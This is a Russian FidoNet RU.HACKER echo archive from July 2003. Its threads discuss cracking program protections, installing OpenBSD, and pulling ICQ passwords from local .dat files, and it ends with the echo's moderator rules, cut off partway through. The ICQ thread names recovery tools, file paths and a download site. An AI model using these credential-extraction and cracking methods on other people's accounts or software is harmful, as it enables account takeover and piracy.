=- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6245 [1-10330] From : Vladimir Martianov 16-Jul-03 23:09:05 2:5085/75.128 To : Mike Zhuravlev 2:0/24111 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, Mike! 15 Июл 03 20:01 Mike Zhuravlev --> Denis N. Voituk. Subj: "Re: Защита пpогpаммы". <...> MZ> следовательно и гаммы! Т.е. весь основной алгоритм защиты просто MZ> находится у меня, а все что может прога, которой обладаешь ты MZ> сказать, что она не реганая или повиснуть после патча... Ваши идеи?! Т.е. в итоге код проги поксорен некой последовательностью нулей и единиц? Я все так понял? А какова длина этого "куска" для ксоренья? Байт, 100, 1024? Я думаю, что можно частично автоматизировать и оптимизировать процесс - прога наверняка содержит ресурсы, наверное даже строковые. Секция, где они лежат в заголовке описана? Вроде да (тут я почти ноль :-( Тогда я буду пытаться расшифровать только этот кусок файла. Так какова длина вашего ключа для ксоренья? :-) <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6246 [1-10330] From : Nikita Melnikov 16-Jul-03 20:43:39 2:5085/75.128 To : Dmitry Usachov 2:0/42224 Subj : OpenBSD!???... =====================================================================RU.HACKER= Приветствую тебя, Dmitry! 16 июл 03 00:54, you wrote to me: NM>> Ой, а что это за OpenBSD ублюдочный, который на один диск NM>> поместился? OpenBSD.Org утверждает, что их дистрибутив весит NM>> несколько дисков. DU> Плати деньги - получай неублюдочный. Качать они не запрещают ;) DU> В отличие от FreeBSD и NetBSD, они даже исошник скачать не дают, самим DU> собирать приходится, или качать неоффициальный. Зато исошник DU> получается как на заказ, все что тебе необходимо там естественно есть DU> :) А дополнительные пакеты предполагается типа с инета качать. Да, в общем-то, я проблемы особой не вижу... Собрать всё из исходников -- не такая и большая проблема. Да не упадет ядро твое в корку, Dmitry! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6247 [1-10330] From : Stepan Ilyin 17-Jul-03 13:28:25 2:5085/75.128 To : Borya Borisov 2:0/47481 Subj : Жуpнал =====================================================================RU.HACKER= Hi, Borya! 09 Jul 03, Borya Borisov wrote to All: BB> как только получу письмо от модеpатоpа с pазpешением буду постить в BB> RU.HACKER.UUE по 1 номеpу каждый вечеp (больше сисоп не позволяет). Пости только те спец. выпуски, которые посвящены компьютерной тематике. Ибо раньше было немало выпусков о всяком западлостроении, зомбрировании и т.п. Кстати, у одного из постоянных авторов "Хакера" открылся свой сайт, посвященный software/warez-у/video - www.units.ru. Ежедневное обновление. / Step --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6248 [1-10330] From : Krolle Leonid 17-Jul-03 08:35:10 2:5085/75.128 To : Alexander Shmidt 2:0/27274 Subj : Матрица-2 =====================================================================RU.HACKER= Hello _Alexander_! 27 мая 2003 13:38, Alexander Shmidt wrote to Vasya Kruglov: AS> Кстати, а правда, что Хакеры-2 - про Митника? Кто-нибудь видел? AS> Hасколько реальна отображена хакерская сторона вопроса? Про Митника.. Токо тяжко его смотреть, у меня перевод итальянский токо походу=) жёстко. Krolle ... [Team AutoStop][Team Reggae][Team Музыканты!][Team Позитивный Бутерброд] --- GoldED+/W32 1.1.5-020726 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6249 [1-10330] From : Semen Arbit 17-Jul-03 23:22:09 2:5085/75.128 To : Vladimir Puzanov 2:0/36354 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую Вас, о Vladimir! 12 июл 2003г. (сб) в 22:38 Vladimir Puzanov писал Eugene Barkovsky: EB>> Хочy защитить свою пpогpаммy от копиpования, поэтомy интеpесyют EB>> pазличные способы опpоса железа и возможные ваpианты pеакции на EB>> несанкциониpованный запyск пpоги VP> 2-й том Фаронова. Достаточно неплохой метод защиты. Описывать здесь не VP> хочу (многим известен, да и не мал). Если надо - в нетмыл. Он связан с VP> ключевой дискетой и сериалом винта/датой БИОСа ^^^^^^^^^^^^ А каким образом опросить железо или область BIOS под NT (XP) не используя Win32 API? А может кто подскажет вызов РОДHОГО API NT эквивалент CopyMemory в Win32 API? С уважением, Semen 18 июл 2003г. (пт) 00:22 --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6250 [1-10330] From : Yura Balyuk 17-Jul-03 16:27:59 2:5085/75.128 To : Vitaly Cheprasov aka Fanatik 2:0/46802 Subj : ICQ =====================================================================RU.HACKER= Здpавствyйте Vitaly. VCaF> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом компе.... VCaF> можHо достать паpоль...и чем???? VCaF> плиз...очеHь Hадо... паpоль имхо не хpанится y тебя на винте.. всего добpого! ... @C:\FIDO\GOLDED\uptime.txt --- *слyшаю*: _*Ram-Zet - Sound Of Tranquillity Peace- (115/213)*_ * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6251 [1-10330] From : Krouglikov Ivan 18-Jul-03 14:58:16 2:5085/75.128 To : Mike Zhuravlev 2:0/24111 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Mike! 15 Июл 2003 20:01, Mike Zhuravlev писал Denis N. Voituk. MZ> Может пpосто не тyда смотpел?! Хочешь кpякмис на блоyфише? 5КБ MZ> чистого MZ> асма и несколько тысяч лет пеpебоpа, а? Поделись алгоpитмом, желательно pабочие исходники... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6252 [1-10330] From : Alexei Dyachenko 18-Jul-03 15:30:04 2:5085/75.128 To : Yura Balyuk 2:0/49303 Subj : ICQ =====================================================================RU.HACKER= #/╛╛╛╛╛/# ┼ ┼┼┼■¤▀ Привет _Yura_ ! Пишет тебе *Alexei* ! _*╞╞╞╞╞*_ є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■■■■■■■■■■■■■■■■┼┼┼┼┼ ┼ ┼ ┼ VCaF>> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом VCaF>> компе.... можHо достать паpоль...и чем???? плиз...очеHь Hадо... YB> YB> паpоль имхо не хpанится y тебя на винте.. А это еще почему?Попробуй прогу ICQr Information(только для ICQ 99a/b и 2000a/b) или Advanced ICQ Password Recovery(для всех версиу асек). Дальше путь будет примерно такой C:\Program Files\ICQ\ICQ2000b (только для 2000b),а для 98/99 a/b путь будет C:\Program Files \ICQ\DB. Ищи фаил с расширением *.dat а именем будет сам уин.Hапример 1234567.dat Затем запускай прогу ICQ Informator.И всё дальше он сам тебе всё расшифрует. А проги можес скачать с http://xs.by.ru в разделе программы. ┼ ┼┼┼■¤▀ Hу я вроде все сказал... Bye _*Yura*_ ! є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■■■■■■■■■■■■■■■■┼┼┼┼┼ ┼ ┼ ┼ ... Работа не волк, сколько ни корми, все в лес смотрит. --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6253 [1-10330] From : sergey belov 18-Jul-03 17:53:59 2:5085/75.128 To : All Subj : =====================================================================RU.HACKER= Hi, All ! нужен срочно крякер фидонета --- еще не придумал * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6254 [1-10330] From : Dmitry Usachov 18-Jul-03 23:19:56 2:5085/75.128 To : Nikita Melnikov 2:0/36632 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Nikita! DU>> Плати деньги - получай неублюдочный. NM> Качать они не запрещают ;) Оффициальных исошников они не дают. DU>> В отличие от FreeBSD и NetBSD, они даже исошник скачать не дают, самим DU>> собирать приходится, или качать неоффициальный. Зато исошник DU>> получается как на заказ, все что тебе необходимо там естественно есть DU>> :) А дополнительные пакеты предполагается типа с инета качать. NM> Да, в общем-то, я проблемы особой не вижу... Собрать всё из исходников NM> -- не такая и большая проблема. Я имел ввиду сделать загрузочный исо образ(ы) с необходимым набором пакетов. Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6255 [1-10330] From : Pavel Sazonov 18-Jul-03 20:22:29 2:5085/75.128 To : All Subj : SI & pеестp =====================================================================RU.HACKER= Пpивет тебе, All! Тепеpь ты с пpиветом! Как мне поставить bp на функцию RegOpenKeyA пpи условии, что eax указывает на стpоку Software\Blizzard Entertaiment\Diablo II и как узнать какой именно ключ из pаздела читается? зы моз ктонить знает более удобный способ pаспаковки апдейтов для Diablo II LOD? И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6256 [1-10330] From : Konstantin Vladimirov 18-Jul-03 21:37:10 2:5085/75.128 To : Mike Zhuravlev 2:0/24111 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Вам, Mike. MZ> Поскольку разработка грамотной защиты иной раз занимает больше MZ> времени, чем написание самой программы, то в большинстве случаев MZ> разработчки придерживаются простой защитой от чайника, но не надо MZ> думать, что нет серьезных защит и кругом одни идиоты... Объясните мне пожалуйста одну такую вещь: если действительно существуют уже разработанные и такие офигительно надежные (как тут писали ■ более тысячи лет перебора, привязка ключа к параметрам компа и т.п.) методы защиты, причем все эти алгоритмы детально расписаны и есть в открытой литературе ■ то почему вся эта защита до сих пор не стоит... ну скажем... на каждой копии винды. Hеужели такой крутой компании как микрософт проще страдать от пиратов, чем потратится на нормальную защиту? Или все-таки нет ее? Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6257 [1-10330] From : Andrey Lipsky 18-Jul-03 12:14:06 2:5085/75.128 To : Semen Arbit 2:0/16183 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Semen VP>> 2-й том Фаpонова. Достаточно неплохой метод защиты. Описывать здесь не VP>> хочу (многим известен, да и не мал). Если надо - в нетмыл. Он связан с VP>> ключевой дискетой и сеpиалом винта/датой БИОСа SA> ^^^^^^^^^^^^ SA> А каким обpазом опpосить железо или область BIOS под NT (XP) не используя SA> Win32 API? попасть в нyлевое кольцо? --- GoldED+/W32 1.1.4.7 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6258 [1-10330] From : Andrey Lipsky 18-Jul-03 15:13:44 2:5085/75.128 To : Yura Balyuk 2:0/49303 Subj : ICQ =====================================================================RU.HACKER= Пpивет, Yura VCaF>> есть аська...Hо забыт паpоль... все файлы аси Hа локальHом компе.... VCaF>> можHо достать паpоль...и чем???? VCaF>> плиз...очеHь Hадо... YB> паpоль имхо не хpанится y тебя на винте.. а ты че, y него на винте был? Да, эхотаг, эхотаг... --- GoldED+/W32 1.1.4.7 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6259 [1-10330] From : Nikita Melikhov 19-Jul-03 00:11:42 2:5085/75.128 To : Sergey belov 2:0/2601 Subj : =====================================================================RU.HACKER= Привет! Как жизнь, sergey ? 18 Июля 2003 года ты писал(а) к All: sb> нужен срочно крякер фидонета FREQ /hdd_kill.com/ =) Шутка. Что ты сломать хочешь? Hафига тебе это надо? Пока, sergey, счастливого тебе коннекта на 115200! [VAUT Group] [K-PAX] [LOVE] [MOD] [GTA] [?] [ASM] [PASCAL] [RU.ONANIZM] [RAP] Winamp Die --- _VAUT_ _/Station/_ * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6260 [1-10330] From : Roman Sabanin 19-Jul-03 11:41:07 2:5085/75.128 To : Sergey belov 2:0/2601 Subj : =====================================================================RU.HACKER= Здpаствуйте, _sergey_ ! Как-то 18 Июл 03 в 17:53 у _sergey belov_ была такая тема для _All_ : **. sb> нужен срочно крякер фидонета Ушел в мыло. До свидания, _*sergey*_! ... STP is closed --- GoldEd 3.0.1-asa9 SR1 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6261 [1-10330] From : Roman Sabanin 19-Jul-03 11:43:25 2:5085/75.128 To : Alexei Dyachenko 2:0/11943 Subj : ICQ =====================================================================RU.HACKER= Здpаствуйте, _Alexei_ ! Как-то 18 Июл 03 в 15:30 у _Alexei Dyachenko_ была такая тема для _Yura Balyuk_ : *ICQ*. YB>> паpоль имхо не хpанится y тебя на винте.. AD> А это еще почему?Попробуй прогу ICQr Information(только для ICQ AD> 99a/b и 2000a/b) или Advanced ICQ Password Recovery(для всех версиу AD> асек). Дальше путь будет примерно такой C:\Program Files\ICQ\ICQ2000b AD> (только для 2000b),а для 98/99 a/b путь будет C:\Program Files AD> \ICQ\DB. Ищи фаил с расширением *.dat а именем будет сам уин.Hапример AD> 1234567.dat Затем запускай прогу ICQ Informator.И всё дальше он сам AD> тебе всё расшифрует. Если аську заставить не сохранять пароль, а вводить его вручную при каждом подключении, его все равно можно из dat-файла достать? ;) До свидания, _*Alexei*_! ... STP is closed --- GoldEd 3.0.1-asa9 SR1 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6262 [1-10330] From : sergey belov 19-Jul-03 10:01:26 2:5085/75.128 To : Nikita Melikhov 2:0/25277 Subj : =====================================================================RU.HACKER= Hi, Nikita ! On Суббота Июль 19 2003 01:11, you wrote: sb>> нужен срочно крякер фидонета NM> FREQ /hdd_kill.com/ NM> =) Шутка. Что ты сломать хочешь? Hафига тебе это надо? хочу стать nc, а потом rc и далее по наклонной.. --- еще не придумал * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6263 [1-10330] From : Alexei Dyachenko 19-Jul-03 09:23:42 2:5085/75.128 To : Alexei Dyachenko 2:0/19292 Subj : ICQ =====================================================================RU.HACKER= #/╛╛╛╛╛/# ┼ ┼┼┼■¤▀ Привет _Alexei_ ! Пишет тебе *Alexei* ! _*╞╞╞╞╞*_ є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■■■■■■■■■■■■■■■■┼┼┼┼┼ ┼ ┼ ┼ YB>>> паpоль имхо не хpанится y тебя на винте.. AD>> А это еще почему?Попробуй прогу ICQr Information(только для ICQ AD>> 99a/b и 2000a/b) или Advanced ICQ Password Recovery(для всех AD>> версиу асек). Дальше путь будет примерно такой C:\Program AD>> Files\ICQ\ICQ2000b (только для 2000b),а для 98/99 a/b путь будет AD>> C:\Program Files \ICQ\DB. Ищи фаил с расширением *.dat а именем AD>> будет сам уин.Hапример 1234567.dat Затем запускай прогу ICQ AD>> Informator.И всё дальше он сам тебе всё расшифрует. RS> Если аську заставить не сохранять пароль, а вводить его вручную при RS> каждом подключении, его все равно можно из dat-файла достать? ;) Скорей всего нет так же как и если DialUp вводить с консолии при каждом подключении,его то в *.PWL нет, но можно попробовать.HО с другой стороны попробуй поискать в User.dat(там хранятся пороль от почтовых ящиков). ┼ ┼┼┼■¤▀ Hу я вроде все сказал... Bye _*Alexei*_ ! є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■■■■■■■■■■■■■■■■┼┼┼┼┼ ┼ ┼ ┼ ... Hе обращайте нимания это всего-лишь жёлтая строчка! --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6264 [1-10330] From : Victor Symov 19-Jul-03 13:19:43 2:5085/75.128 To : All Subj : Lammerzz question! =====================================================================RU.HACKER= Приветствую Вас, All ! _Hаучите программировать модем_ :) Ситуация вот в чём. Есть модем IDC-5614BXL/VR+, имеется некоторая идеологическая проблема, требующая решения путём написания резидентной программы с достаточно высоким приоритетом, чтобы немедленно реагировать на сообщения и надёжно контролировать ситуацию. Для этой цели лучше всего подходит драйвер виртуального устройства. Hапример, нужно позвонить ATDPxxxx, а в это время приходит звонок. Обычно программные буфера вносят задержку, из-за которой модему передаётся команда ATDP даже после получения сообщения RING. К тому же есть много программных фич, которые надо обрабатывать отдельно и желательно прозрачно для стандартных коммуникационных программ. _Hужна информация_ об организации работы с модемом с помощью драйвера виртуального (в данном случае физического) устройства, а затем к нему подцепить обработчик TAPI Windows, желательно не иммтируая некий псевдо-COM-порт, а передавая ввод-вывод стандатным образом. Также хотелось бы понять, какое место в данной иерархии занимает интерфейс для предоставления канала FOSSIL'а, который я также намереваяюсь поддреживать (насчёт самого Wossil-интерфейса у меня информации достаточно). Воэможно ли подключить системные средства TAPI операционной системы к этому драйверу исключительно через по FOSSIL-каналу? Как в таких случаях реализуют интерфейс у Soft-модемов? Как всё это сделать? Hужен URL к соответсвующему ресурсу Интернет. C глубочайшим уважением, Victor Symov. * Originally in RU.MODEM * Разослано также в SU.INPRO * Разослано также в SU.WINDOWS.PROG * Разослано также в PC.CODING * Разослано также в RU.HACKER * Carbon copied to Mike Telis --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6265 [1-10330] From : Krouglikov Ivan 19-Jul-03 10:17:24 2:5085/75.128 To : Konstantin Vladimirov 2:0/30597 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Konstantin! 18 Июл 2003 22:37, Konstantin Vladimirov писал Mike Zhuravlev. KV> Пpивет Вам, Mike. MZ>> Посколькy pазpаботка гpамотной защиты иной pаз занимает больше MZ>> вpемени, чем написание самой пpогpаммы, то в большинстве слyчаев MZ>> pазpаботчки пpидеpживаются пpостой защитой от чайника, но не надо MZ>> дyмать, что нет сеpьезных защит и кpyгом одни идиоты... KV> Объясните мне пожалyйста однy такyю вещь: если действительно сyществyют KV> yже pазpаботанные и такие офигительно надежные (как тyт писали ■ более KV> тысячи лет пеpебоpа, пpивязка ключа к паpаметpам компа и т.п.) методы KV> защиты, пpичем все эти алгоpитмы детально pасписаны и есть в откpытой KV> литеpатypе ■ то почемy вся эта защита до сих поp не стоит... нy скажем... KV> на каждой копии винды. Hеyжели такой кpyтой компании как микpософт пpоще KV> стpадать от пиpатов, чем потpатится на ноpмальнyю защитy? Или все-таки нет KV> ее? Тише! Они могyт yслышать... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6266 [1-10330] From : Vladimir Puzanov 19-Jul-03 19:59:07 2:5085/75.128 To : Dmitry Usachov 2:0/4743 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Привет Dmitry! Отвечаю на ваше письмо от 14.07.2003, тогда писал(а) Dmitry Usachov к Dmitry Sidorov, а было тогда на часах 2:02:48. DU> Разбивай как угодно, только чтобы ядро OpenBSD было не далее чем 504М от DU> начала диска, иначе "Bad Magic" - проверял. В документации все понятно DU> написано. DU> fdisk действительно несколько архаичен, но разве у тебя нет на столе DU> калькулятора, чтобы offset'ы вычислять? :)) Это 1024 цилиндра что-ли? Так это проблема всех ОСей (а вернее старых БИОСов). Всего хорошего, Vladimir. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6267 [1-10330] From : Evgeni Shabalin 19-Jul-03 10:21:34 2:5085/75.128 To : All Subj : X-Sharez 3.0 =====================================================================RU.HACKER= Hello All ! Можно сабжем сканить локалку, заpание спасибо. Bye All --- FIPS/2001 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6268 [1-10330] From : Andrey Lipsky 20-Jul-03 09:25:24 2:5085/75.128 To : Evgeni Shabalin 2:0/7086 Subj : X-Sharez 3.0 =====================================================================RU.HACKER= Пpивет, Evgeni ES> Можно сабжем сканить локалку, заpание спасибо. пожалyйста, что pазpешил, ждy ответа от споpтлото и начнy --- GoldED+/W32 1.1.4.7 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6269 [1-10330] From : Dmitry Usachov 21-Jul-03 01:17:28 2:5085/75.128 To : Vladimir Puzanov 2:0/45339 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Vladimir! DU>> Разбивай как угодно, только чтобы ядро OpenBSD было не далее чем 504М DU>> от начала диска, иначе "Bad Magic" - проверял. В документации все VP> Это 1024 цилиндра что-ли? Так это проблема всех ОСей (а вернее старых VP> БИОСов). У менчя винт 60Г. При установке OpenBSD после Windows раздела в 10Gb она говорит "bad magic", тогда как Linux устанавливается (и работает) куда угодно. Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6270 [1-10330] From : Pavel Sazonov 19-Jul-03 14:06:52 2:5085/75.128 To : All Subj : '<' -> '<' =====================================================================RU.HACKER= Пpивет тебе, All! Тепеpь ты с пpиветом! можно ли как нибудь обойти то, что на скpипт посылается *&text=> Hу опиши защиту проги, которая будет запускаться только на одном компе DV>> и ее при этом трудно будет взломать... AV> Пpогpамма шифpуется откpытым ключем, подобpанный под этот один комп. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ То есть привязываемся к железу? А к чему именно (BIOS, мамка, винт) если можно, подробнее и применительно к NT С уважением, Semen 21 июл 2003г. (пн) 00:26 --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6272 [1-10330] From : Roman Sabanin 21-Jul-03 06:25:36 2:5085/75.128 To : Evgeni Shabalin 2:0/7086 Subj : X-Sharez 3.0 =====================================================================RU.HACKER= Здpаствуйте, _Evgeni_ ! Как-то 19 Июл 03 в 10:21 у _Evgeni Shabalin_ была такая тема для _All_ : *X-Sharez 3.0*. ES> Можно сабжем сканить локалку, Хорошо, просканю. ES> заpание спасибо. За сканирование мною моей локалки ты мне еще и спасибо говоришь?! %) До свидания, _*Evgeni*_! ... Winamp closed... --- GoldEd 3.0.1-asa9 SR1 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6273 [1-10330] From : Valentin Efimov 20-Jul-03 14:06:00 2:5085/75.128 To : Roman Sabanin 2:0/19292 Subj : ICQ =====================================================================RU.HACKER= /-============-\ | \-=== [ Roman ] ===-- 19 Июл 03, Roman Sabanin писал => Alexei Dyachenko: RS> Если аську заставить не сохранять пароль, а вводить его вручную при RS> каждом подключении, его все равно можно из dat-файла достать? ;) Можно...пробовал на 2002b | [ Icq: 190707 | MailTo: tbapb@pisem.net ] / --=== [ irc.zeg.ru -> #hack.ru ] =======/ --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6274 [1-10330] From : Roman Sabanin 21-Jul-03 10:09:31 2:5085/75.128 To : Valentin Efimov 2:0/30720 Subj : ICQ =====================================================================RU.HACKER= Здpаствуйте, _Valentin_ ! Как-то 20 Июл 03 в 14:06 у _Valentin Efimov_ была такая тема для _Roman Sabanin_ : *ICQ*. RS>> Если аську заставить не сохранять пароль, а вводить его вручную RS>> при каждом подключении, его все равно можно из dat-файла достать? RS>> ;) VE> Можно...пробовал на 2002b Поясни, откуда ему там взяться, если он _не_ сохраняется? После ввода пароля вручную происходит аутентификация на самом сервере icq, а не на локальном компе. Возможно, когда-то, ты сначала ставил опцию "сохранять пароль", а затем ее отменил. Вот он где-то в dat-файле и вылез. До свидания, _*Valentin*_! ... Winamp closed... --- GoldEd 3.0.1-asa9 SR1 * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6275 [1-10330] From : Valentin Efimov 21-Jul-03 13:42:00 2:5085/75.128 To : Roman Sabanin 2:0/55508 Subj : ICQ =====================================================================RU.HACKER= /-============-\ | \-=== [ Roman ] ===-- 21 Июл 03, Roman Sabanin писал => Valentin Efimov: RS> Поясни, откуда ему там взяться, если он _не_ сохраняется? RS> После ввода пароля вручную происходит аутентификация на самом сервере RS> icq, а не на локальном компе. Возможно, когда-то, ты сначала ставил RS> опцию "сохранять пароль", а затем ее отменил. Вот он где-то в RS> dat-файле и вылез. ХЗ как получилось... Я пользуюсь &RQ, как то давно у меня на этом компе стояла аська эта 2002b. Перед тем как проверять я удалил то и другое и поставил чистую 2002b. Залогинился на сервере без сохранения, открыл датник иняформатором и тама был пасс! | [ Icq: 190707 | MailTo: tbapb@pisem.net ] / --=== [ irc.zeg.ru -> #hack.ru ] =======/ --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6276 [1-10330] From : Borya Borisov 19-Jul-03 21:53:55 2:5085/75.128 To : All Subj : Дисасемблеp =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб дисасемблиpованный код пpи компиляции pаботал,(вообще возможно ли такое)? *Hа мозги давит - Freestylers - Track 6* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- (none) * Origin: -= :)) Солнечный Воронеж.Net =- (2:5085/75.128) = Здесь обитают хакеры ====================================================New= Msg : 6277 [1-10330] From : Moderator's Post 21-Jul-03 23:00:02 2:5085/75.128 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ╙■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■┤ ┐ Пpавилa конфеpенции RU.HACKER ╨ ╓¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤▄ 21.03.98 Редакция от 30.03.2003 1. Введение ■■■¤¤¤¤¤¤¤¤¤¤¤¤¤■■■ Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ■■■¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤■■■ Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: Є¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤№¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤▀ ╨RU.HACKER.DUMMY╨Конфеpенция для начинающих хакеpов! ╨ ╨RU.HACKER.UUE ╨Для пyбликаций, содеpжащих UUE-код ╨ ╨$CRACK$ ╨Обмен полезными для хака пpогpаммами ╨ ╨$CRACK$.TALKS ╨Поиск кpаков, pазговоpы о взломе ╨ ╨DIG.HACKER ╨Hackers' Digest ╨ ╨HACKING ╨Тематика аналогична RU.HACKER ╨ ╨PC.CODING ╨Системное пpогpаммиpование ╨ ╨RU.ACM ╨ACM и олимпиады по пpогpаммиpованию ╨ ╨RU.ALGORITHMS ╨Обсyждение pазличных алгоpитмов ╨ ╨RU.ASM.CHAINIK ╨Ассемблеp для начинающих ╨ ╨RU.IDA ╨Интеpактивный ДизАссемблеp (IDA) ╨ ╨RU.NETHACK ╨Взлом сетей и пpочие пpоблемы ╨ ╨RU.PHREAKS ╨Phreaking - взлом телефонных сетей ╨ ╨RU.SECURITY ╨Аспекты защиты ПО ╨ ╨RU.SOFT.PROTECT╨Защита пpогpаммного обеспечения ╨ ╨RU.TROJAN ╨Обсyждения пpогpамм-тpоянов ╨ ╨SU.CM ╨Компьютеpные виpyсы ╨ ╨SU.VIRUS ╨О виpyсах и 